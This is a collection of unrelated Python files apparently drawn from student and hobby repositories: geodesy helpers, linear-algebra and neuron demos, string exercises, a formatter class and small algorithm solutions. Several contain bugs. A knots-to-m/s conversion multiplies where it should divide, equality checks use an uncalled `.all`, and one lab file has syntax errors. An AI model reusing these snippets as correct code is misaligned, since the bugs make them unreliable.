ticket10 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=10)
"""
row_a = []
for i in range(1, 11):
row_a.append(MovieTicket(name="Avengers", time="20:00", row="A", seat_num=i))
for ticket in row_a:
print(ticket)
task1 = BookMovieTicketTask()
task2 = BookMovieTicketTask()
task1.select_seat(ticket=row_a[5], email="john@example.com")
task2.select_seat(ticket=row_a[5], email="fionna@example.com")
task1.start()
task2.start()
if __name__ == '__main__':
main() |
83cb7da034cf3000737f8e7afa4723095edb2d5b | jojonas/py1090 | /py1090/helpers.py | 3,478 | 3.984375 | 4 | import math
EARTH_RADIUS = 6371008.7714 # m
r"""The average earth radius :math:`R_0`. It is defined as the mean radius of the semi-axes.
The values are taken from the WGS 84 (World Geodetic System 1984) ellipsoid
`(definition of the Department Of Defense, Jan. 2000, p. 37) <http://earth-info.nga.mil/GandG/publications/tr8350.2/wgs84fin.pdf>`_ .
.. math::
R_0 = 6371008.7714 \mathrm{m}
"""
def distance_between(lat1, lon1, lat2, lon2):
r"""Calculates the distance between two locations, in meters, using the `Haversine <http://en.wikipedia.org/wiki/Haversine_formula>`_
formula.
The bearing between latitude, longitude: :math:`(\phi_1, \lambda_1)` and :math:`(\phi_2, \lambda_2)` is given by
.. math::
a = \sin^2(\frac{\phi_2 - \phi_1}{2}) + \cos(\phi_1) \cos(\phi_2) \sin^2(\frac{\lambda_2 - \lambda_1}{2})
d = 2 R_0 \cdot \mathrm{atan2}(\sqrt{a}, \sqrt{1-a})
The earth radius :math:`R_0` is taken to be :py:data:`py1090.helpers.EARTH_RADIUS`. The approximation of a spherical earth is made.
Args:
lat1 (float): :math:`\phi_1`, the latitude of the reference location
lon1 (float): :math:`\lambda_1`, the longitude of the reference location
lat2 (float): :math:`\phi_2`, the latitude of the target location
lon2 (float): :math:`\lambda_2`, the longitude of the target location
Returns:
float: the distance in meters.
"""
lambda1 = math.radians(lon1)
lambda2 = math.radians(lon2)
phi1 = math.radians(lat1)
phi2 = math.radians(lat2)
dphi = phi2-phi1
dlambda = lambda2-lambda1
a = math.pow(math.sin(dphi/2), 2) + math.cos(phi1)*math.cos(phi2)*math.pow(math.sin(dlambda/2), 2)
dsigma = 2*math.atan2(math.sqrt(a), math.sqrt(1-a))
distance = EARTH_RADIUS * dsigma
return distance
def bearing_between(lat1, lon1, lat2, lon2):
r"""Calculates the bearing angle between two locations, in radians.
The bearing between latitude, longitude: :math:`(\phi_1, \lambda_1)` and :math:`(\phi_2, \lambda_2)` is given by
.. math::
\mathrm{atan2}(\sin(\lambda_2 - \lambda_1) \cos(\phi_1), \cos(\phi_2) \sin(\phi_1) - \sin(\phi_2) \cos(\phi_2) \cos(\lambda_2 - \lambda_1))
Args:
lat1 (float): :math:`\phi_1`, the latitude of the reference location
lon1 (float): :math:`\lambda_1`, the longitude of the reference location
lat2 (float): :math:`\phi_2`, the latitude of the target location
lon2 (float): :math:`\lambda_2`, the longitude of the target location
Returns:
float: the bearing angle in radians, between :math:`-\pi` and :math:`\pi`.
"""
lambda1 = math.radians(lon1)
lambda2 = math.radians(lon2)
phi1 = math.radians(lat1)
phi2 = math.radians(lat2)
dphi = phi2-phi1
dlambda = lambda2-lambda1
bearing = math.atan2(math.sin(dlambda)*math.cos(phi1), \
math.cos(phi2)*math.sin(phi1)-math.sin(phi2)*math.cos(phi1)*math.cos(dlambda))
return bearing
def knots_to_kmh(knots):
"""Converts velocity in knots to velocity in km/h.
1 knot is 1 nm/h (nautical mile per hour) and 1.852 km/h.
Args:
knots (float): velocity in knots
Returns:
float: velocity in km/h
"""
return 1.852*knots
def knots_to_mps(knots):
"""Converts velocity in knots to velocity in m/s (meters per second).
1 knot is 1 nm/h (nautical mile per hour), 1.852 km/h and about 6.67 m/s.
Args:
knots (float): velocity in knots
Returns:
float: velocity in m/s
"""
kmh = knots_to_kmh(knots)
return 3.6*kmh
|
80739d61b3cf031d93248ea3b5d6a6814c732aeb | luandadantas/URI-Python | /iniciante/1042_sort_simples.py | 248 | 3.515625 | 4 | A, B, C = input().split()
A = int(A)
B = int(B)
C = int(C)
valores_crescentes_list = [A, B, C]
valores_crescentes_list.sort()
ordem_original = [A, B, C]
for i in valores_crescentes_list:
print(i)
print()
for i in ordem_original:
print(i) |
76a15c11ba8ade5d665c07f103e4e00e1e2b82f4 | NVGNVG/python_project | /Cryp_pass_project.py | 715 | 4.03125 | 4 | #Made by:NVG
# Python 3 code: Hash creator
# Get hash generator (string >> hexadecimal)
import hashlib
#Input and initializing
print('Word to convert to hash:')
x = input()
print('Word: ' + x)
# encoding using encode()
# then sending to md5()
result = hashlib.md5(x.encode())
result_512 = hashlib.sha512(x.encode())
result_b2b = hashlib.blake2b(x.encode())
# printing the equivalent hexadecimal value.
print("The hexadecimal equivalent of MD5 hash is : ", end ="")
print(result.hexdigest())
print("The hexadecimal equivalent of SHA512 hash is : ", end ="")
print(result_512.hexdigest())
print("The hexadecimal equivalent of BLAKE2b hash is : ", end ="")
print(result_b2b.hexdigest()) |
e52f61bd060ef4f43a9bcb2d4de21a93091f9e09 | arun007chauhan/tutorials_pmath | /linerarAlgebra/linear_transformation.py | 4,125 | 3.921875 | 4 | import numpy as np
import matplotlib.pyplot as plt
# what does it mean linear transformation
"""
def --> A linear transformation T:U->V,is a
function or operator that carries elements of vector space U(called domain)
to vector space V(called cododomain),and which has to two aditional properties
T(u1) + T(u2) = T(u1) + T(u2) for all u1,u2∈U
T(αu)=αT(u)
(T+S)(u)=T(u)+S(u)
(αT)(u)=αT(u)
(S∘T)(u)=S(T(u)) composition
"""
# let's consider the matrices A and B as linear operators that act over vector(linear) space L
A = np.array([[1, 3, 4],
[2, 3, 4],
[4, 3, 2]])
B = np.array([[2, 4, 5],
[4, 5, 6],
[4, 5, 3]])
# let's get the vectors x and y belongs of vector space L
x = np.array([[1],
[2],
[4]])
y = np.array([[3],
[5],
[7]])
result1 = A.dot(x + y)
result2 = A.dot(x) + A.dot(y)
if (result1 == result2).all:
print("distributed")
result1 = 5 * A.dot(x)
result2 = 5 * A.dot(x)
if (result1 == result2).all:
print("commutative in multiplication by real numbers")
C = A.dot(B)
result1 = C.dot(x)
result2 = B * (A.dot(x))
if (result1 == result2).all:
print("composition of operators is real fact")
# let's to review some advance theorем
"""
let's define rotation of vector
Oiler matrix
[sin(a) , 0 , 0]
[0 , cos(a) , 0]
[0 , 0 . cos(a)]
"""
def get_rotation_matrix(angle):
R = np.array([[np.cos(angle), -np.sin(angle)],
[np.sin(angle), np.cos(angle)]])
return R
def get_translation_matrix(mutiplier):
T = np.array([[mutiplier, 0],
[0, mutiplier]])
return T
R = get_rotation_matrix(0)
"""
when determinant is equal 1 this means
the matrix is orthogonal
"""
# print(R)
# print(np.linalg.det(R)) ## determinant is equal 1
# lets get the eigenvectors values and vectors of R
# print(np.linalg.eig(R))
"""
rotation example
"""
x = np.array([[1],
[0]])
origin = [0], [0] # origin point
# plt.quiver(*origin, (x[:,0]), [0,1], color=['black','black'], scale=10)
ax = plt.axes()
ax.arrow(0, 0, 10, 0, head_width=0.3, head_length=0.2, fc='black', ec='black') # create e1 axes
ax.arrow(0, 0, 0, 10, head_width=0.3, head_length=0.2, fc='black', ec='black') # create e2 axes
plt.xlim(0, 10) # show measure
plt.ylim(0, 10)
R = get_rotation_matrix(np.pi / 6) # 30 degree
# decoment to see result
#
# rot_x = R.dot(x)
#
# x = np.array([[1],
# [0]])
#
# ax.arrow(2, 2, int(x[0, 0]), int(x[1, 0]), head_width=0.5, head_length=0.7, fc='red', ec='black')
#
# # plt.quiver(*origin, (x[:,0]),(u[:,0]),(u[:,0]), color=['black','black'], scale=10)
# # plt.quiver(*origin, x[:,0], color=['blue','black'], scale=10)
#
# u = R.dot(x)
#
# ax.arrow(2, 2, u[0, 0], u[1, 0], head_width=0.5, head_length=0.7, fc='lightblue', ec='black')
#
# u = R.dot(u)
#
# ax.arrow(2, 2, u[0, 0], u[1, 0], head_width=0.5, head_length=0.7, fc='green', ec='black')
#
# u = R.dot(u)
#
# ax.arrow(2, 2, u[0, 0], u[1, 0], head_width=0.5, head_length=0.7, fc='blue', ec='black')
#
plt.grid
# plt.show()
"""
let's see the tranlation of vector
the translation of vector
"""
x = np.array([[1],
[2]])
#ax.arrow(2, 2, x[0, 0], x[1, 0], head_width=0.3, head_length=0.2, fc='blue', ec='black')
T = get_translation_matrix(3)
x = T.dot(x)
#ax.arrow(2, 2, x[0, 0], x[1, 0], head_width=0.3, head_length=0.2, fc='blue', ec='black')
#plt.show() decoment to result
"""
the dot(scalar product is always the same number in every different coordinates system
"""
"""
lets to make some more to see the power of operators
if we want to roate some vector with 30 degree and to increase it with some mutiplier n
"""
R = get_rotation_matrix(np.pi/6)
T = get_translation_matrix(5)
x = np.array([[1],
[1]])
ax.arrow(2, 2, x[0, 0], x[1, 0], head_width=0.3, head_length=0.2, fc='blue', ec='black')
transform = R.dot(T)
x = transform.dot(x)
ax.arrow(2, 2, x[0, 0], x[1, 0], head_width=0.3, head_length=0.2, fc='blue', ec='black' ,label='Arrow2')
plt.text(x[0, 0],x[1, 0], 'translation')
plt.show() |
34c32af3ed1de9c4b2e4c7f1a142e213e4a2ff35 | Lyxilion/McColloch-Pitts | /McColloch-Pitts.py | 1,680 | 3.609375 | 4 | def sgn(x:float):
"""
La fonction sign
:param x: un nombre
:return: 1 ou 0
:rtype: int
"""
if x<0:
return 0
else :
return 1
def f(X:list,H:list,t:int):
"""
fontion de tranfert de McColloch-Pitts
:param X: list : Connexion ativatrice
:param H: list : Connexion inhibitrice
:param t: int :seuil d'activation
:return: la réponse du neurone
:rtype: bool
"""
x = 0
h = 0
for i in range(len(X)):
x += X[i]
for i in range(len(H)):
h += H[i]
if h == 0 :
return sgn(x - t)
else :
return 0
"""
Fonctionnement :
Un neurone est représenté par une fonction de transfert, qui prend trois arguments :
-Une liste des connexions activatrices
-Une liste des connexions inhibitrices
-Un seuil
le seuil correspond au nombre de connexion activatrice qui doit être active pour que le neurone renvoie 1
si une seule connexion inhibitrice est vraie, le neurone renvoyé 0
"""
"""
Modélisation de la fonction répondant à cette table de vérité :
_________________
| Entre | Sorties |
|_________________|
| 001 | 1 |
| 011 | 1 |
| 101 | 1 |
| 111 | 1 |
| Sinon | 0 |
|_________________|
"""
X=[0,0,1]
print(f( #Si une des 4 chaines est trouvée, renvoie 1
[
f([X[2]],[X[0],X[1]],1), # Reconnaît la chaine '001'
f([X[1],X[2]],[X[0]],2), # Reconnaît la chaine '011'
f([X[0],X[2]],[X[1]],2), # Reconnaît la chaine '101'
f([X[0],X[1],X[2]],[0],3) # Reconnaît la chaine '111'
]
, [0], 1))
|
6fb6f0ae3d03bc1bb7ecfd76ddb54c7d71d3b496 | JackM15/python-mysql-practice | /carspractice.py | 350 | 3.78125 | 4 | # ---- Cars Practice ---- #
import sqlite3
#create new db
db = sqlite3.connect("cars.db")
#create new cursor
cursor = db.cursor()
#add table called inventory with "make, model, quantity" fields.
cursor.execute("""CREATE TABLE cars
(make TEXT, model TEXT, quantity INT)
""")
#close the databse connection
db.close()
|
eda1f0a1df8e9dd94e1ca7b9e64ff92a4dca049b | niyati2k/SSL | /pythonlab.py | 5,645 | 3.9375 | 4 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
r=10
pi = 3.14
volume = (4/3)*pi*r*r*r
print (volume)
# In[ ]:
def add(a,b):
return a+b
def sub(a,b):
return a-b
def mult(a,b):
return a*b
def power(a,b):
return pow(a,b)
def div(a,b):
return a/b
def cal(d,a,b):
return d(a,b)
cal(power,5,10)
# In[5]:
def is_triangle(a,b,c):
if a+b>=c and b+c>=a and a+b>=c:
return "YES"
else:
return "NO"
a = int(input())
b = int(input())
c = int(input())
is_triangle(a,b,c)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# In[1]:
def f(n):
if n == 1 or n == 2:
return 1
return f(n-1) + f(n-2)
n = int(input())
for i in range(1,n+1):
print (f(i), end=" ")
f(n)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# In[27]:
import math
const = 2*math.sqrt(2)/9801
k = 0
s = 0
var = pow(10,-15)
while 1:
temp = const*math.factorial(4*k)*(1103 + 26390*k)/(pow(math.factorial(k),4)*pow(396,4*k))
if temp<var :
break
s = s+ temp
k = k+1
print (1/s)
print(math.pi)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
# In[5]:
def my_reverse(s):
rev_s = ''
for i in s:
rev_s = i + rev_s
print (rev_s)
s = input()
my_reverse(s)
#or
import math
def my_rev(s):
s1=''
n=len(s)
for i in range(0,n):
s1=s1+s[n-1-i]
print(s1)
s=input()
my_rev(s)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~``
#QUES 7
def find_count(s, index, elem):
l = len(s)
k=0
arr = []
for i in range(index+1,l):
if elem == s[i]:
arr.append(i)
k = k +1
print(k,arr)
s = input()
p = int(input())
elem = input()
find_count(s,p,elem)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
# QUES 8
arr = [int(i) for i in input().split()]
s = []
s.append(arr[0])
for j in range(1,len(arr)):
s.append(s[j-1] + arr[j])
print (s)
#or
import math
def cum(l):
ans=[]
ans.append(l[0])
for i in range(1,len(l)):
ans.append(ans[i-1]+l[i])
return ans
elem=[1,2,3,4]
print(cum(elem))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# QUES 9
def is_anagram(s1,s2):
if len(s1) != len(s2):
return False
else:
arr = []
for i in range(26):
arr.append(0)
for i in s1:
arr[ord(i)-ord('a')] +=1
for i in s2:
arr[ord(i)-ord('a')] -=1
for i in range(26):
if arr[i] != 0:
return False
return True
s1 = input()
s2 = input()
is_anagram(s1,s2)
or
#import math
def is_ana(s1,s2):
if len(s1) != len(s2):
return False
a= []
b= []
for i in range(0,len(s1)):
a.append(s1[i])
b.append(s2[i])
a.sort()
b.sort()
for i in range(0,len(s1)):
if a[i] != b[i]:
return False
return True
a=input()
b=input()
print(is_ana(a,b))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#QUES 10
Dic = {}
def frq(s):
dic = {}
for i in s:
dic[i] = dic.get(i,0) +1
Dic[s] = dic
print (Dic)
s = input()
frq(s)
#or
import math
def qten(s):
dic={}
dic[s]={}
for i in range(0,len(s)):
if s[i] in dic[s]:
dic[s][s[i]]+=1
else:
dic[s][s[i]]=1
print(dic)
s=input()
qten(s)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
#QUES 11
import pickle
Dic = {}
def frq(s):
dic = {}
for i in s:
dic[i] = dic.get(i,0) +1
Dic[s] = dic
f = open('hello.txt',"r")
if f.mode == 'r':
#contents = f.read()
f1 = f.read()
f1 = f1.split()
for i in f1:
frq(i)
#print (Dic)
# Store data (serialize)
handle=open('Dic.pickle','wb')
pickle.dump(Dic, handle)
handle=open('Dic.pickle','rb')
b = pickle.load(handle)
handle.close()
print (b)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#QUES 12
import random
f= open("words.txt",r)
lines = f.read()
lines = lines.split()
lines = random.sample(lines,200)
lines.sort(key=len,reverse=True)
print(lines)
f.close()
f1 = open("words_200.txt", "w")
for i in lines:
f1.write(i +'\n')
f1.close()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import os
print(os.getcwd())
# To print absolute path on your system
# os.path.abspath('.')
# To print files and directories in the current directory
# on your system
# os.listdir('.')
topdown − If optional argument topdown is True or not specified,
directories are scanned from top-down.
If topdown is set to False, directories are scanned from bottom-up.
import os
for root, dirs, files in os.walk(".", topdown=False):
for name in files:
print(os.path.join(root, name))
for name in dirs:
print(os.path.join(root, name))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#QUES 13
import os
def get_file_list(path):
files= []
# r=root, d=directories, f = files
for r, d, f in os.walk(path):
for k in f:
files.append(os.path.join(r, k))
for i in files:
print(i)
path = os.getcwd()
get_file_list(path)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
# In[104]:
import sys
def sed(pattern,replace,file1,file2):
f = open(file1,'r')
filedata = f.read()
f.close()
newdata = filedata.replace(pattern,replace)
f = open(file2,'w')
f.write(newdata)
f.close()
print ("enter pattern string")
s = input()
print ("enter replacement string")
r = input()
print ("enter file name 1")
f1 = input()
print ("enter file name 2")
f2 = input()
sed(s,r,f1,f2)
|
10aa799e5bda732f551469a8ee74e404a4a93a83 | JensGM/pyTurbSim | /pyts/io/formatter.py | 6,361 | 4.0625 | 4 | from string import Formatter
class SuperFormatter(Formatter):
r"""
SuperFormatter adds the following capabilities:
1. Initialize with a template string, and the :meth:`__call__` method uses
this string. Thus, example usage of this formatter looks like::
template = SuperFormatter(template_string)
out_string = template(*args, **kwargs)
2. White space at the end of a format specifier is stripped. This
allows for aligning text within the template.
3. Multiple format strings separated by ``|`` can be specified
within a template. This formatter will loop over the format
strings until it finds one that doesn't throw a ValueError.
For example, the format string ``6d|<6.3f|8s`` will format the
following objects as:
+----------------+------------------+
| input | output string |
+================+==================+
| ``3.74583754`` | ``'3.746 '`` |
+----------------+------------------+
| ``384`` | ``' 384'`` |
+----------------+------------------+
| ``None`` | ``'None '``|
+----------------+------------------+
4. Default values may be specified after a ``/`` at the end of the
format string. For example if the container is
``{show_data:s/False}``, and there is no key ``show_data`` in
``**kwargs``, then ``False`` will fill that location.
5. The :attr:`format_prfx` attribute allows the user to define a
default container prefix. This will be prepended to all format
specifiers that are a single-character `type` specifier. For
example if ``format_prfx = '<20'``, then the format specifier
``'f'`` will be changed to ``'<20f'``, but ``'>08.3f'`` will be
unchanged. This is applied to each specifier within a multiple
specification, thus ``'d|f|s'`` would actually be
``'<20d|<20f|<20s'``.
6. Custom format specifiers have been implemented by adding a
hook that searches for a `_format_<specifier>` method prior to
running the normal formatting routines. That method takes the
value to be formatted as input (in addition to *self*), and
should return the fully-formatted string (no further formatting
is applied).
For example, a custom format specifier `pet` (specified as
``{my_dog:pet}`` in the template) could be defined as::
class MyNewFormatter(SuperFormatter):
def _format_pet(self, value):
return value.upper()
Note that this will throw an ``AttributeError`` if *my_dog* is an
object without an ``upper`` method (i.e. not a string), but you
could add to the method to handle all of the different types
that ``value`` might be.
7. Custom format specifiers with arguments can be specified as
``{my_dogs:pets(10s,10s)}``. In this case the string inside
the parenthesis is supplied as the second argument to the
``_format_pets`` method. The method that implements this
format could be defined as::
class MyNewFormatter(SuperFormatter):
def _format_pets(self, value, form2):
out = ''
for v,f in zip(value, form2.split(',')):
out += format(v, f)
return out
"""
format_prfx = ''
default_format_prfx = ''
allow_sloppy = False
def __init__(self, template):
# Override the base methods to initialize the formatter with
# the template string.
self.template = template
def __call__(self, *args, **kwargs):
r"""
Format the template string with `*args` and `**kwargs`.
"""
return self.format(self.template, *args, **kwargs)
def __iter__(self,):
return self.parse(self.template)
def get_value(self, key, args, kwargs):
key = key.rstrip()
self._current_name = key
if isinstance(key, (int, long)):
return args[key]
else:
try:
return kwargs[key]
except KeyError:
return None
def _fail(self):
if self.allow_sloppy:
return '??SOME JUNK??'
else:
# This _current_name business is a DIRTY HACK.
raise KeyError("'%s' not specified and no default "
"value found in template." % self._current_name)
def _format_default(self, default_val):
return format(default_val, self.default_format_prfx + 's')
def format_field(self, value, format_spec):
format_spec = format_spec.rstrip() # Strip trailing spaces
default_val = None
if '/' in format_spec:
format_spec, default_val = format_spec.split('/', 1)
# set the default value if there is no input
if value is None:
return self._format_default(default_val)
elif value is None:
return self._fail()
if '|' in format_spec:
format_spec = format_spec.split('|')
else:
format_spec = [format_spec]
for form in format_spec:
formtail = None
if '(' in form and form.endswith(')'):
form, formtail = form.split('(', 1)
formtail = formtail[:-1]
try:
if hasattr(self, '_format_' + form):
if formtail is None:
return getattr(self, '_format_' + form)(value)
else:
return getattr(self, '_format_' + form)(value,
formtail)
if form in ["b", "c", "d", "e", "E",
"f", "F", "g", "G", "n",
"o", "s", "x", "X", "%", '']:
form = self.format_prfx + form
return format(value, form)
except ValueError:
pass
except TypeError:
pass
# Finally, try the default again:
if default_val is None:
raise ValueError('Invalid conversion specification')
return self._format_default(default_val)
|
bccea6ad9572b8056f29c74172ed4d1cc16f621e | songzy12/LeetCode | /python/142.linked-list-cycle-ii.py | 467 | 3.515625 | 4 | from List import *
# try no extra space, when you are free
class Solution:
# @param head, a ListNode
# @return a list node
def detectCycle(self, head):
d={}
while head!=None:
if head in d:
return head
d[head]=1
head=head.next
return None
head=ListNode(1)
head.next=ListNode(2)
head.next.next=ListNode(3)
head.next.next.next=head
print(Solution().detectCycle(head).val)
|
00f235dcdc2118d47313d02216c25b361a4fe2af | peterjunlin/PythonTest | /practices/datatype_set.py | 1,079 | 3.921875 | 4 | def set_initialization():
set1 = {1, 2, 3}
assert type(set1) == set
set1 = set([1, 2, 3])
assert type(set1) == set
set1 = set('hello world')
assert set1 == {'h', 'd', 'r', 'l', 'o', 'e', ' ', 'w'}
def set_operations():
set1 = {1, 2, 3}
# Append element to set.
set1.add(4)
assert set1 == {1, 2, 3, 4}
# Repeated value has no effect
set1.add(1)
assert set1 == {1, 2, 3, 4}
# element order in set is not significant
assert {'l', ' ', 'w', 'o', 'h', 'r'} == {' ', 'l', 'w', 'o', 'h', 'r'}
set2 = {3, 4, 5, 6}
set3 = set1 | set2
assert set3 == {1, 2, 3, 4, 6, 5}
set3 = set1 & set2
assert set3 == {3, 4}
set3 = set1 - set2
assert set3 == {1, 2}
set3 = set1 ^ set2
assert set3 == {1, 2, 5, 6}
def set_comprehension():
set1 = {x for x in 'hello world' if x not in 'abcdefg'}
assert set1 == {'l', ' ', 'w', 'o', 'h', 'r'}
if __name__ == '__main__':
set_initialization()
set_operations()
set_comprehension()
|
20fb56bae40e7d26973527c882ee648087a74cd5 | Ruban-chris/Interview-Prep-in-Python | /cracking_the_coding_interview/1/1-7.py | 766 | 3.78125 | 4 | def rotate_matrix(square_matrix):
length = len(square_matrix)
for i in range(length//2):
for j in range(i, length - i - 1):
k = j
l = (length - i - 1)
m = l
n = (length - k - 1)
o = n
p = (length - l - 1)
(square_matrix[i][j],
square_matrix[k][l],
square_matrix[m][n],
square_matrix[o][p]) = (square_matrix[o][p],
square_matrix[i][j],
square_matrix[k][l],
square_matrix[m][n])
square_1 = [
[1,2,3,4],
[5,6,7,8],
[9,10,11,12],
[13,14,15,16]
]
rotate_matrix(square_1)
print(square_1)
[
[7, 11, 5, 15],
[14, 12, 16, 10],
[9, 3, 1, 2],
[13, 4, 8, 6]
]
|
9b687451ff5872e2e264499a83aac8497631a680 | oystein-hr/just-one-more | /just_one_more.py | 905 | 3.6875 | 4 | import re
from functools import partial
def increment_match(matchobj):
value = matchobj.group(0)
leading_zero = re.compile(r'[0]\d+')
if re.match(leading_zero, value):
return '0' + str(int(value) + 1)
else:
return str(int(value) + 1)
def increment(values):
check_negative = partial(re.match, r'^-\d+$')
find_digits = re.compile(r'\d+')
new_values = []
for item in values:
# Level 1
if type(item) is int:
item += 1
# Level 2
elif type(item) is str:
if item.isalpha():
continue
elif check_negative(item):
item = int(item) + 1
elif item.isdigit():
item = int(item) + 1
# Level 3
else:
item = re.sub(find_digits, increment_match, item)
new_values.append(item)
return new_values
|
0b39be8f0f5fc1f5b5fcf763a1982857d6770a27 | ofir123/MP3-Organizer | /mp3organizer/datatypes/track.py | 1,432 | 4.0625 | 4 | class Track(object):
"""
A POPO class to hold all the track data.
Contains the following information:
Number, Title and Disc Number.
"""
def __init__(self, number, title, disc_num=None):
"""
Initializes the track data object.
Normalizes the number by adding a zero if needed.
Normalizes the title by using capital letters for each word.
:param number: The track's number.
:param title: The track's title.
:param disc_num: The Disc number (if there are multiple discs in the album).
"""
self.number = str(number) if len(str(number)) > 1 else '0' + str(number)
self.title = ' '.join(x.capitalize() for x in title.replace('\\', ' - ').replace('/', ' - ').replace('?', '').
strip().split(' '))
self.disc_num = disc_num
def __eq__(self, other):
"""
Compare tracks to one another using the information.
:param other: The other track to compare to.
:return: True if the objects are equal, and False otherwise.
"""
return other.number == self.number and other.title == self.title and other.disc_num == self.disc_num
def __repr__(self):
"""
Prints the track data in the format <##> - <Title>.
:return: The string representing the track's data.
"""
return '{} - {}'.format(self.number, self.title)
|
c4c461bb5c74a42b009eb48c8ef331a3b45384fb | SuperGuy10/LeetCode_Practice | /Python/811. Subdomain Visit Count.py | 3,262 | 3.90625 | 4 | '''
A website domain like "discuss.leetcode.com" consists of various subdomains.
At the top level, we have "com", at the next level, we have "leetcode.com", and at the lowest level, "discuss.leetcode.com".
When we visit a domain like "discuss.leetcode.com", we will also visit the parent domains "leetcode.com" and "com" implicitly.
Now, call a "count-paired domain" to be a count (representing the number of visits this domain received),
followed by a space, followed by the address. An example of a count-paired domain might be "9001 discuss.leetcode.com".
We are given a list cpdomains of count-paired domains. We would like a list of count-paired domains,
(in the same format as the input, and in any order), that explicitly counts the number of visits to each subdomain.
Example 1:
Input:
["9001 discuss.leetcode.com"]
Output:
["9001 discuss.leetcode.com", "9001 leetcode.com", "9001 com"]
Explanation:
We only have one website domain: "discuss.leetcode.com". As discussed above, the subdomain "leetcode.com" and "com" will also be visited. So they will all be visited 9001 times.
Example 2:
Input:
["900 google.mail.com", "50 yahoo.com", "1 intel.mail.com", "5 wiki.org"]
Output:
["901 mail.com","50 yahoo.com","900 google.mail.com","5 wiki.org","5 org","1 intel.mail.com","951 com"]
Explanation:
We will visit "google.mail.com" 900 times, "yahoo.com" 50 times, "intel.mail.com" once and "wiki.org" 5 times. For the subdomains, we will visit "mail.com" 900 + 1 = 901 times, "com" 900 + 50 + 1 = 951 times, and "org" 5 times.
Notes:
The length of cpdomains will not exceed 100.
The length of each domain name will not exceed 100.
Each address will have either 1 or 2 "." characters.
The input count in any count-paired domain will not exceed 10000.
The answer output can be returned in any order.
'''
'''
!!!dict.get(key[, value])!!!
get() Parameters
The get() method takes maximum of two parameters:
key - key to be searched in the dictionary
value (optional) - Value to be returned if the key is not found. The default value is None.
!!!str.split([separator [, maxsplit]])!!!
split() Parameters
The split() method takes maximum of 2 parameters:
separator (optional)- The is a delimiter. The string splits at the specified separator.
If the separator is not specified, any whitespace (space, newline etc.) string is a separator.
maxsplit (optional) - The maxsplit defines the maximum number of splits.
The default value of maxsplit is -1, meaning, no limit on the number of splits.
!!!dictionary.items()!!!
The items() method is similar to dictionary's viewitems() method in Python 2.7
'''
class Solution:
def subdomainVisits(self, cpdomains: List[str]) -> List[str]:
dic =dict()
ans = []
for domain in cpdomains:
val = int(domain.split(' ')[0]) # split number
list_domains = domain.split(' ')[1].split('.') # split domain
for d in range(len(list_domains)):
key = '.'.join(list_domains[d:len(list_domains)]) # make sub domain
dic[key] = dic.get(key, 0) + val # calculate counts
for key,val in dic.items():
ans.append(' '.join([str(val), key]))
return ans
|
3744272fa9795ad6545d698d2c011e54645bf129 | TurcsanyAdam/Gitland | /forloop5.py | 137 | 3.828125 | 4 | x = int(input("Enter a number here: "))
for i in range(x):
ws = " " * (x -i -1)
st = "*" * i
print(ws + st + "*" + st + ws)
|
ec5d2fd1eff3263f653b361cc4cbad311605c380 | robgoyal/TicTacToePython | /player.py | 1,423 | 4.1875 | 4 | # Name: player.py
# Author: Robin Goyal
# Last-Modified: Decemeber 9, 2017
# Purpose: Implement the player class for game
class Player(object):
marks = ["X", "O"]
def __init__(self, mark, board):
self.mark = mark
self.board = board
def getMark(self):
'''
return -> string: mark of the player (X or O)
'''
return self.mark
def takeTurn(self):
'''
Places a mark on the board for the player who's turn it is.
Only applies the mark is the position is empty.
'''
try:
prompt = "Player {}'s turn. Choose row and column for your turn: "
x, y = map(int, input(prompt.format(self.mark)).strip().split())
except ValueError:
# Initialize x and y to -1 to enter while loop
x, y = -1, -1
# If the location isn't valid, the while loop condition will short circuit
while not(self.board.isLocationValid(x, y) and self.board.isLocationEmpty(x, y)):
prompt = "\tThat location isn't valid! Choose another row and column for your turn: "
try:
x, y = map(int, input(prompt.format(self.mark)).strip().split())
# Except error where user provided a single value. Continue to next iteration of loop
except ValueError:
continue
print()
self.board.placeMark(self, x, y)
|
7913d363fc3e01bf7e563cf50ef3fffddf4089f5 | DmytroZeleniukh93/python_book | /class_9.py | 1,028 | 4 | 4 | # 9-1 Restaurant
class Restaurant:
def __init__(self, restaurant_name, cuisine_type):
self.restaurant_name = restaurant_name
self.cuisine_type = cuisine_type
def describe_restaurant(self):
print(f'{self.restaurant_name} {self.cuisine_type}')
def open_restaurant(self):
print(f'{self.restaurant_name} work!')
restaurant1 = Restaurant('Volt', 'Chicken')
restaurant1.describe_restaurant()
restaurant1.open_restaurant()
# 9-2 describe_restaurant()
restaurant2 = Restaurant('Lol', 'Candy')
restaurant2.describe_restaurant()
restaurant2.open_restaurant()
# 9-3 create class User
class User:
def __init__(self, first_name, last_name, age):
self.first_name = first_name
self.last_name = last_name
self.age = age
def describe_user(self):
print(f'{self.first_name} {self.last_name} {self.age}')
def greet_user(self):
print(f'Hello {self.first_name}!')
user1 = User('Alir', 'Kelo', '20')
user1.describe_user()
user1.greet_user()
|
6c4663df9471e7db43c97e18b906bedbbd80833c | subhasmitasahoo/leetcode-algorithm-solutions | /convert-a-number-to-hexadecimal.py | 482 | 3.578125 | 4 | #Problem link: https://leetcode.com/problems/convert-a-number-to-hexadecimal/
